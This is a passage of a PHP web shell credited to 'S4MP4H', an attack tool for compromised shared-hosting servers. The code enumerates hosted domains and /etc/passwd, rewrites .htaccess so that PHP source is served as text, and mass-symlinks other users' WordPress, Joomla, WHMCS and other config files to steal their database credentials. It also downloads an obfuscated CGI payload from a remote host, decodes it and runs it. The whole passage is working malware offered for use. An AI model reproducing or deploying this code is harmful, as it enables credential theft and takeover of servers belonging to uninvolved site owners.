1589 die("[Domain] : <span class='guyu'>Can't Read -> [ /etc/named.conf ]</span><br/><br/><div class=footer><div class=info>[ Shell By <a href='http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H' target='_blank'><span class='gaya'>".$xName."</span></a> ]</div><div class=jaya>Allright Reserved © ".date("Y",time())." ".$xName."</div></div>");
1590 }
1591 preg_match_all("#named/(.*?).db#",$file,$r);
1592 $domains=array_unique($r[1]); {
1593 $total=0;
1594 $no=1;
1595 echo "<table border='1' bordercolor='#333333' width='400' cellpadding='1' cellspacing='0' class='sortable'>
1596<thead><th style='width:40px;padding:0px;'>No</th><th style='width:100px;padding:0px;'>Users</th><th>Domains</th><th style='width:50px;padding:0px;'>Open</th></thead><tbody>";
1597 foreach($domains as $domain) {
1598 $user=posix_getpwuid(@fileowner("/etc/valiases/".$domain));
1599 echo "<tr><td align='center'>".$no++."</td><td>".$user['name']."</td><td><a href='http://".$domain."/' class='gaya' target='_blank'>".$domain."</td><td align='center'><a href='http://".$domain."/' class='gaya' target='_blank'>Open</td></tr>";
1600 $total++;
1601 }
1602 echo "</tbody><tfoot><th>Totals</th><th colspan='3'>Founded ".$total." Domains</th><tfoot></table>";
1603 }
1604 echo "</div></center>";
1605}
1606elseif(isset($_GET['x'])&&($_GET['x']=='scan')) {
1607 echo "<center style='-webkit-margin-before:35px;'>";
1608 if(isset($_POST['Submit'])) {
1609 $ceks=array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
1610 foreach($ceks as $ceker) {
1611 if($_POST[$ceker]<>"") {
1612 $six.=$_POST[$ceker].".";
1613 }
1614 }
1615 $cek=explode('.',$six);
1616 function ListFiles($dir) {
1617 if($dh=opendir($dir)) {
1618 $files=Array();
1619 $inner_files=Array();
1620 while($file=readdir($dh)) {
1621 if($file!="."&&$file!="..") {
1622 if(is_dir($dir."/".$file)) {
1623 $inner_files=ListFiles($dir."/".$file);
1624 if(is_array($inner_files))
1625 $files=array_merge($files,$inner_files);
1626 }
1627 else {
1628 array_push($files,$dir."/".$file);
1629 }
1630 }
1631 }
1632 closedir($dh);
1633 return $files;
1634 }
1635 }
1636 ?>
1637<br/><center>
1638<table class="explore">
1639<form action="" method="post">[Scan] : <span class="gaya">Successfull</span> <input type="submit" class="inputzbut" value="Rescan"></form><br/>
1640<tr>
1641<th align="center" width="15">No</th>
1642<th align="center" width="90">Scan Type</th>
1643<th align="center">File Location</th>
1644<th align="center" width="35">Chmod</th>
1645<th align="center" width="60">Perms</th>
1646<th align="center" width="50">Writable</th>
1647<th align="center" width="100">Modified</th>
1648<th align="center" width="60">File Size</th>
1649<th align="center" width="100">Actions</th>
1650</tr><br/>
1651<?php
1652$target=$_SERVER['DOCUMENT_ROOT'];
1653 $i=0;
1654 foreach(ListFiles($target) as $key=>$file) {
1655 $nFile=substr($file,-4,4);
1656 if($nFile==".php") {
1657 if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']) {
1658 }
1659 else {
1660 $ops=@file_get_contents($file);
1661 $op=strtolower($ops);
1662 $arr=array('c99'=>'c99','r57'=>'r57','s4mp4h'=>'s4mp4h','wso'=>'wso');
1663 $sis=0;
1664 if($op)
1665 $size=filesize($file);
1666 $last_modified=filemtime($file);
1667 $last=date("Y-m-d H:i:s",$last_modified);
1668 $filn=basename($file);
1669 $is_writable=is_writable($file)?"YES":"NO";
1670 foreach($arr as $key=>$val) {
1671 if(@preg_match("/$key/",$op)) {
1672 $sis="1";
1673 $i++;
1674 ?>
1675<tr onmouseover="mover(this)" onmouseout="mout(this)">
1676<td align="center"><font color="red"><?=$i?></font></td>
1677<td align="center"><font color="red"><?=$val?></font></td>
1678<td align="left">
1679<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1680</td>
1681<td align="center"><?=substr(sprintf('%o',fileperms($file)),-4)?></td>
1682<td align="center"><?=get_perms($file)?></td>
1683<td align="center"><?=$is_writable?></td>
1684<td align="center"><font color="red"><?=$last?></font></td>
1685<td align="right"><font color="red"><?=$size?> byte</font></td>
1686<td align="center"><a href="?edit=<?=$file?>&bug=<?=$val?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$val?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1687</td>
1688</tr>
1689<?php
1690 }
1691 }
1692 if($sis<>"1") {
1693 if((@preg_match("/system\((.*?)\)/",$op))&&(@preg_match("/<pre>/",$op))&&(@preg_match("/empty\((.*?)\)/",$op))) {
1694 $sis="2";
1695 $i++;
1696 $val="hidden shell";
1697 ?>
1698<tr onmouseover="mover(this)" onmouseout="mout(this)">
1699<td align="center"><font color="blue"><?=$i?></font></td>
1700<td align="center"><font color="blue"><?=$val?></font></td>
1701<td align="left">
1702<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1703</td>
1704<td align="center"><?=substr(sprintf('%o',fileperms($file)),-4)?></td>
1705<td align="center"><?=get_perms($file)?></td>
1706<td align="center"><?=$is_writable?></td>
1707<td align="center"><font color="blue"><?=$last?></font></td>
1708<td align="right"><font color="blue"><?=$size?> byte</font></td>
1709<td align="center"><a href="?edit=<?=$file?>&bug=<?=$val?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$val?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1710</td>
1711</tr>
1712<?php
1713 }
1714 }
1715 if($sis=="0") {
1716 foreach($cek as $bugs) {
1717 if($bugs<>"") {
1718 if(@preg_match("/$bugs\((.*?)\)/",$op)) {
1719 $i++;
1720 ?>
1721<tr onmouseover="mover(this)" onmouseout="mout(this)">
1722<td align="center"><?=$i?></td>
1723<td align="center"><?=$bugs?></td>
1724<td align="left">
1725<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1726</td>
1727<td align="center"><?=substr(sprintf('%o',fileperms($file)),-4)?></td>
1728<td align="center"><?=get_perms($file)?></td>
1729<td align="center"><?=$is_writable?></td>
1730<td align="center"><?=$last?></td>
1731<td align="right"><?=$size?> byte</td>
1732<td align="center"><a href="?edit=<?=$file?>&bug=<?=$bugs?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$bugs?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1733</td>
1734</tr>
1735<?php
1736 }
1737 }
1738 }
1739 }
1740 if($_POST['textV']<>"") {
1741 $text=$_POST['textV'];
1742 if(@preg_match("/$text/",$op)) {
1743 $i++;
1744 ?>
1745<tr onmouseover="mover(this)" onmouseout="mout(this)">
1746<td align="center"><?=$i?></td>
1747<td align="center"><?=$text?></td>
1748<td align="left">
1749<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1750</td>
1751<td align="center"><?=substr(sprintf('%o',fileperms($file)),-4)?></td>
1752<td align="center"><?=get_perms($file)?></td>
1753<td align="center"><?=$is_writable?></td>
1754<td align="center"><?=$last?></td>
1755<td align="right"><?=$size?> byte</td>
1756<td align="center"><a href="?edit=<?=$file?>&bug=<?=$text?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$text?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1757</td>
1758</tr>
1759<?php
1760 }
1761 }
1762 }
1763 }
1764 }
1765 if($i==0) {
1766 foreach($cek as $bugs) {
1767 if($bugs<>"") {
1768 $x++;
1769 ?>
1770<tr onmouseover="mover(this)" onmouseout="mout(this)">
1771<td align="center"><?=$x?></td>
1772<td align="center"><?=$bugs?></td>
1773<td align="center">!!!!</td>
1774<td align="center">?????????</td>
1775<td align="center">???</td>
1776<td align="center">not exist</td>
1777<td align="center">no record</td>
1778<td align="right">- byte</td>
1779<td align="center">- | - | - | -</td>
1780</tr>
1781<?php
1782 }
1783 }
1784 }
1785 ?>
1786<tr><th colspan="9">Founded <?=$i?> Files Scanned</th></tr>
1787</table>
1788<?php
1789 }
1790 else {
1791 ?>
1792<center>
1793<?php
1794$find=array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
1795 ?>
1796<form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
1797<center>
1798<table class="tabnet" width="200">
1799<tr><th>Select Scan Type</th></tr>
1800<tr><td >
1801<script language="javascript">
1802function cekKlik(){
1803if (!document.fCheck.cekV.checked)
1804 document.fCheck.textV.disabled=true;
1805else
1806 document.fCheck.textV.disabled=false;
1807if(document.fCheck.cekV.checked){
1808 master = master + 1;
1809}else{
1810 if(master > 0 ){
1811master = master - 1;
1812 }else{
1813master = master;
1814 }
1815}
1816if(master != 0){
1817 document.fCheck.Submit.disabled=false;
1818 document.fCheck.Submit.value='Start !';
1819}else{
1820 document.fCheck.Submit.disabled=true;
1821 document.fCheck.Submit.value='Stop !';
1822}
1823}
1824</script>
1825<?php
1826foreach($find as $bug) {
1827 ?>
1828<script language="javascript">
1829var master = 0;
1830function checkValue<?=$bug?>(){
1831if(document.fCheck.<?=$bug?>.checked){
1832 master = master + 1;
1833}else{
1834 if(master > 0 ){
1835master = master - 1;
1836 }else{
1837master = master;
1838 }
1839}
1840if(master != 0){
1841 document.fCheck.Submit.disabled=false;
1842 document.fCheck.Submit.value='Start !';
1843}else{
1844 document.fCheck.Submit.disabled=true;
1845 document.fCheck.Submit.value='Stop !';
1846}
1847}
1848</script>
1849<input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" /> <?=$bug?><br/>
1850<?php
1851 }
1852 ?>
1853<input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
1854<input class="inputz" disabled="disabled" name="textV" value="other_key_word" onFocus="this.select()" type="text" id="textV">
1855<input type="hidden" name="asal" value="abcd"></td>
1856</tr>
1857<tr><th colspan="2">
1858<input disabled="disabled" type="submit" name="Submit" value="Stop !" class="inputzbut"/></form></th>
1859</tr>
1860</table>
1861<?php
1862 }
1863 ?>
1864<?php
1865}
1866elseif(isset($_GET['x'])&&($_GET['x']=='configsss')) {
1867 ?>
1868<form action="?y=<?php echo $pwd;?>&x=configsss" method="post" style="-webkit-margin-before:20px;">
1869<br/><center>
1870[Config] : <span class="gaya">Get With Path</span> <input type="submit" value="Go !" class="inputzbut" name="pathconfig">
1871</center>
1872</form>
1873<?php
1874echo "<center>";
1875 if(isset($_POST['pathconfig'])) {
1876 echo '<form method="post"><textarea width="500" rows="10" name="user" class="outputz">';
1877 $users=file("/etc/passwd");
1878 foreach($users as $user) {
1879 echo $user;
1880 }
1881 echo '</textarea><br/><br/>[Name] : <input size="35" name="foldername" type="text" value="folder_name" class="inputz"><input class="inputzbut" type="submit" name="pathconfigstart" value="Go !" /></form>';
1882 }
1883 if(isset($_POST['pathconfigstart'])) {
1884 $nc=$_POST['foldername'];
1885 $dir=mkdir($nc,0755);
1886 $r=" Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1887 $f=fopen($nc.'/.htaccess','w');
1888 fwrite($f,$r);
1889 $consym="<a href=".$alamat."/".$nc." style='text-decoration:none;' target='_blank'/>DONE</a>";
1890 echo "<span class='gaya'>[</span> $consym <span class='gaya'>]</span>";
1891 $usrs=explode("\n",$_POST['user']);
1892 $configuration=array("wp-config.php","wp/wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","home/wp-config.php","main/wp-config.php","site/wp-config.php","web/wp-config.php","joomla/configuration.php","blog/configuration.php","home/configuration.php","main/configuration.php","site/configuration.php","web/configuration.php","vb/includes/config.php","includes/config.php","includes/koneksi.php","config/koneksi.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","lib/config.php","includes/configure.php","forum/includes/config.php");
1893 foreach($usrs as $us) {
1894 $usr=explode(":",$us);
1895 $usz=$usr['5'];
1896 $usx=$usr['0'];
1897 foreach($configuration as $c) {
1898 $rs=$usz."/".$c;
1899 $r=$nc."/".$usx." .. ".$c;
1900 symlink($rs,$r);
1901 }
1902 }
1903 }
1904}
1905elseif(isset($_GET['x'])&&($_GET['x']=='configss')) {
1906 ?>
1907<form action="?y=<?php echo $pwd;?>&x=configss" method="post" style="-webkit-margin-before:20px;">
1908<br/><center>
1909[Config] : <span class="gaya">Get With Manual</span> <input type="submit" value="Go !" class="inputzbut" name="symlinks">
1910</center>
1911</form>
1912<?php
1913echo "<center>";
1914 if(isset($_POST['symlinks'])) {
1915 echo '<center><form method="post"><table class="tabnet"><th colspan="2">Manual Symlink</th><tr>
1916<td>File Path :</td><td><input class="inputz" type="text" name="filenya" value="/home/'.$user.'/public_html/config.php" size="50"/></td></tr>
1917<tr><td>Symlink Name :</td><td><input class="inputz" type="text" name="symfile" value="config.txt" size="50"/></td></tr>
1918<tr><th colspan="2"><input class="inputzbut" type="submit" value="Symlink" name="symlinkz" /></th></tr></table></form></center>';
1919 }
1920 $filenya=$_POST['filenya'];
1921 $symfile=$_POST['symfile'];
1922 if(isset($_POST['symlinkz'])) {
1923 mkdir('sym',0755);
1924 chdir('sym');
1925 $rt="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1926 $fo=fopen('.htaccess','w');
1927 fwrite($fo,$rt);
1928 symlink($filenya,$symfile);
1929 echo '<center><span class="gaya">[</span> <a target="_blank" href="sym/'.$symfile.'" >DONE</a> <span class="gaya">]</span></center>';
1930 }
1931}
1932elseif(isset($_GET['x'])&&($_GET['x']=='configs')) {
1933 ?>
1934<form action="?y=<?php echo $pwd;?>&x=configs" method="post" style="-webkit-margin-before:20px;">
1935<br/><center>
1936[Config] : <span class="gaya">Get With Perl</span> <input type="submit" value="Go !" class="inputzbut" name="perlconfig">
1937</center>
1938</form>
1939<?php
1940echo "<center>";
1941 $dn=$_POST['dirname'];
1942 if(isset($_POST['perlconfig'])) {
1943 echo '<form method="post">[Name] : <input size="35" name="dirname" type="text" value="folder_name" class="inputz"><input class="inputzbut" type="submit" name="perlconfigstart" value="Go !" /></form>';
1944 }
1945 if(isset($_POST['perlconfigstart'])) {
1946 mkdir($dn,0755);
1947 chdir($dn);
1948 $kokdosya=".htaccess";
1949 $dosya_adi="$kokdosya";
1950 $dosya=fopen($dosya_adi,'w')ordie("Error");
1951 $metin="Options FollowSymLinks MultiViews Indexes ExecCGI
1952AddType application/x-httpd-cgi .bin
1953AddHandler cgi-script .bin
1954AddHandler cgi-script .bin";
1955 fwrite($dosya,$metin);
1956 fclose($dosya);
1957 $configshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/config.cgi');
1958 $file=fopen("config.bin","w+");
1959 $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($configshell)))));
1960 fclose($file);
1961 chmod("config.bin",0755);
1962 $alamat=str_replace($_SERVER['DOCUMENT_ROOT'],"",@getcwd());
1963 echo "<span class='gaya'>[</span> <a href='".$alamat."' target='_blank'>DONE</a> <span class='gaya'>]</span><br/><br/><iframe src=".$alamat."/config.bin width=97% height=280px frameborder=0 style='overflow-y:hidden;'></iframe></form>";
1964 }
1965}
1966elseif(isset($_GET['x'])&&($_GET['x']=='config')) {
1967 ?>
1968<form action="?y=<?php echo $pwd;?>&x=config" method="post" style="-webkit-margin-before:20px;">
1969<br/><center>
1970[Config] : <span class="gaya">Get With PHP</span> <input type="submit" value="Go !" class="inputzbut" name="phpconfig">
1971</center>
1972</form>
1973<?php
1974echo "<center>";
1975 if(isset($_POST['phpconfig'])) {
1976 echo '<form method="post"><textarea width="500" rows="10" name="user" class="outputz">';
1977 $users=file("/etc/passwd");
1978 foreach($users as $user) {
1979 echo $user;
1980 }
1981 echo '</textarea><br/><br/>[Name] : <input size="35" name="foldername" type="text" value="folder_name" class="inputz"><input class="inputzbut" type="submit" name="phpconfigstart" value="Go !" /></form>';
1982 }
1983 if(isset($_POST['phpconfigstart'])) {
1984 $nc=$_POST['foldername'];
1985 $dir=mkdir($nc,0755);
1986 $r=" Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1987 $f=fopen($nc.'/.htaccess','w');
1988 fwrite($f,$r);
1989 $consym="<a href=".$alamat."/".$nc." style='text-decoration:none;' target='_blank'/>DONE</a>";
1990 echo "<span class='gaya'>[</span> $consym <span class='gaya'>]</span>";
1991 $usrs=explode("\n",$_POST['user']);
1992 $configuration=array("wp-config.php","wp/wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","home/wp-config.php","main/wp-config.php","site/wp-config.php","web/wp-config.php","joomla/configuration.php","blog/configuration.php","home/configuration.php","main/configuration.php","site/configuration.php","web/configuration.php","vb/includes/config.php","includes/config.php","includes/koneksi.php","config/koneksi.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","lib/config.php","includes/configure.php","forum/includes/config.php");
1993 foreach($usrs as $us) {
1994 $usr=explode(":",$us);
1995 $usr[0]."\n";
1996 foreach($usr as $uss) {
1997 $us=trim($uss);
1998 foreach($configuration as $c) {
1999 $rs="/home/".$us."/public_html/".$c;
2000 $r=$nc."/".$us." .. ".$c;
2001 symlink($rs,$r);
2002 }
2003 }
2004 }
2005 }
2006}
2007elseif(isset($_GET['x'])&&($_GET['x']=='cms')) {
2008 echo "<br/><center style='-webkit-margin-before:20px;'>";
2009 $base_url='http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
2010 @mkdir('tmp',0777);
2011 @symlink("/","tmp/root");
2012 $htaccss="Options all
2013 DirectoryIndex syntax.html
2014 AddType text/plain .php
2015 AddHandler server-parsed .php
2016 AddType text/plain .html
2017 AddHandler txt .html
2018 Require None
2019 Satisfy Any";
2020 file_put_contents("tmp/.htaccess",$htaccss);
2021 if(is_readable("/var/named")) {
2022 $list=scandir("/var/named");
2023 $current_dir=posix_getcwd();
2024 $dir=explode("/",$current_dir);
2025 foreach($list as $domain) {
2026 if(strpos($domain,".db")) {
2027 $domain=str_replace('.db','',$domain);
2028 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
2029 error_reporting(0);
2030 $current_dir=posix_getcwd();
2031 $dir=explode("/",$current_dir);
2032 symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2033 symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2034 symlink($owner['dir'].'/'.$dir[3].'/home/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2035 symlink($owner['dir'].'/'.$dir[3].'/main/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2036 symlink($owner['dir'].'/'.$dir[3].'/new/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2037 symlink($owner['dir'].'/'.$dir[3].'/portal/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2038 symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2039 symlink($owner['dir'].'/'.$dir[3].'/web/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2040 symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2041 symlink($owner['dir'].'/'.$dir[3].'/wordpress/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2042 symlink($owner['dir'].'/'.$dir[3].'/v1/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2043 symlink($owner['dir'].'/'.$dir[3].'/v2/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2044 symlink($owner['dir'].'/'.$dir[3].'/v3/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2045 symlink($owner['dir'].'/'.$dir[3].'/v4/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2046 symlink($owner['dir'].'/'.$dir[3].'/v5/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
2047 symlink($owner['dir'].'/'.$dir[3].'/config/koneksi.php',"tmp/".$owner['name'].'-Lokomedia.txt');
2048 symlink($owner['dir'].'/'.$dir[3].'/konfigurasi/koneksi.php',"tmp/".$owner['name'].'-Formulasi.txt');
2049 symlink($owner['dir'].'/'.$dir[3].'/lib/config.php',"tmp/".$owner['name'].'-Balitbang.txt');
2050 symlink($owner['dir'].'/'.$dir[3].'/config.php',"tmp/".$owner['name'].'-PhpBB.txt');
2051 symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"tmp/".$owner['name'].'-vBulletin.txt');
2052 symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2053 symlink($owner['dir'].'/'.$dir[3].'/blog/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2054 symlink($owner['dir'].'/'.$dir[3].'/home/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2055 symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2056 symlink($owner['dir'].'/'.$dir[3].'/main/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2057 symlink($owner['dir'].'/'.$dir[3].'/new/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2058 symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2059 symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2060 symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2061 symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2062 symlink($owner['dir'].'/'.$dir[3].'/v1/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2063 symlink($owner['dir'].'/'.$dir[3].'/v2/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2064 symlink($owner['dir'].'/'.$dir[3].'/v3/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2065 symlink($owner['dir'].'/'.$dir[3].'/v4/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2066 symlink($owner['dir'].'/'.$dir[3].'/v5/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
2067 symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"tmp/".$owner['name'].'-IPB.txt');
2068 symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"tmp/".$owner['name'].'-MyBB.txt');
2069 symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"tmp/".$owner['name'].'-SMF.txt');
2070 symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"tmp/".$owner['name'].'-Drupal.txt');
2071 symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"tmp/".$owner['name'].'-e107.txt');
2072 symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"tmp/".$owner['name'].'-Seditio.txt');
2073 symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"tmp/".$owner['name'].'-osCommerce.txt');
2074 symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2075 symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2076 symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2077 symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2078 symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2079 symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2080 symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2081 symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2082 symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2083 symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2084 symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2085 symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2086 symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
2087 }
2088 }
2089 }
2090 $etc=file_get_contents("/etc/passwd");
2091 $etcz=explode("\n",$etc);
2092 foreach($etcz as $etz) {
2093 $etcc=explode(":",$etz);
2094 error_reporting(0);
2095 $current_dir=posix_getcwd();
2096 $dir=explode("/",$current_dir);
2097 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2098 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2099 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/home/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2100 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/main/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2101 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/new/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2102 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2103 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2104 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2105 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2106 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wordpress/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
2107 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v1/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
